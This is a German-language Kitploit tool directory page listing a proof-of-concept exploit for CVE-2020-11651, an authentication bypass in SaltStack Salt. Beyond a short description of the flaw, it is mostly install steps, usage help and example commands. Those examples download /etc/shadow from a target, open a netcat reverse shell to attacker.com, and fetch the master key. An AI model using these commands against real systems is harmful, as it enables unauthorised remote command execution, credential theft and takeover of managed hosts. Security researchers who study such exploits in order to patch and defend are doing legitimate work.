Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2020-11651 — CVE-2020-11651: Proof of Concept | Kitploit
Tools/GitHubGitHub/0xc0d/cve-2020-11651
SchwachstellenanalyseExploitationDatenexfiltrationPenetrationstestsCommand and ControlRemote-Access-Tool
GitHub0xc0d/cve-2020-11651

CVE-2020-11651

CVE-2020-11651: Proof of Concept

Repository anzeigen
40142vor 5 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2020-11651

Ein Problem wurde in SaltStack Salt vor Version 2019.2.4 und 3000 vor 3000.2 entdeckt. Die ClearFuncs-Klasse des salt-master-Prozesses validiert Methodenaufrufe nicht ordnungsgemäß. Dadurch kann ein entfernter Benutzer ohne Authentifizierung auf einige Methoden zugreifen. Diese Methoden können verwendet werden, um Benutzer-Tokens vom Salt-Master abzurufen und/oder beliebige Befehle auf Salt-Minions auszuführen.

Details

Patches für nicht unterstützte Salt-Versionen

Installation

root@kitploit:~
git clone https://github.com/0xc0d/CVE-2020-11651.git ~/CVE-2020-11651
chmod +x ~/CVE-2020-11651/PoC.py

Verwendung

root@kitploit:~
$ ~/CVE-2020-11651/PoC.py -h
usage: PoC.py [-h] --host HOST [--port PORT] [--execute COMMAND] [--upload src dest] [--download src dest] [--minions] [--quiet] [--fetch-key-only]

CVE-2020-11651 PoC

optional arguments:
  -h, --help            show this help message and exit
  --host HOST, -t HOST
  --port PORT, -p PORT
  --execute COMMAND, -e COMMAND
                        Command to execute. Defaul: /bin/sh (use netcat for reverse shell)
  --upload src dest, -u src dest
                        Upload a file
  --download src dest, -d src dest
                        Download a file
  --minions             Send command to all minions on master
  --quiet, -q           Enable quiet/silent mode
  --fetch-key-only      Only fetch the key
Tool herunterladen

Beispiel

Shadow-Datei herunterladen

root@kitploit:~
./PoC.py --host target.com --download /etc/shadow ./shadow

Reverse Shell ausführen

root@kitploit:~
nc -nvl attacker.com 9999
./PoC.py --host target.com --execute "nc attacker.com 9999 -e \"/bin/sh\""

Schlüssel abrufen

root@kitploit:~
./PoC.py --host target.com --fetch-key-only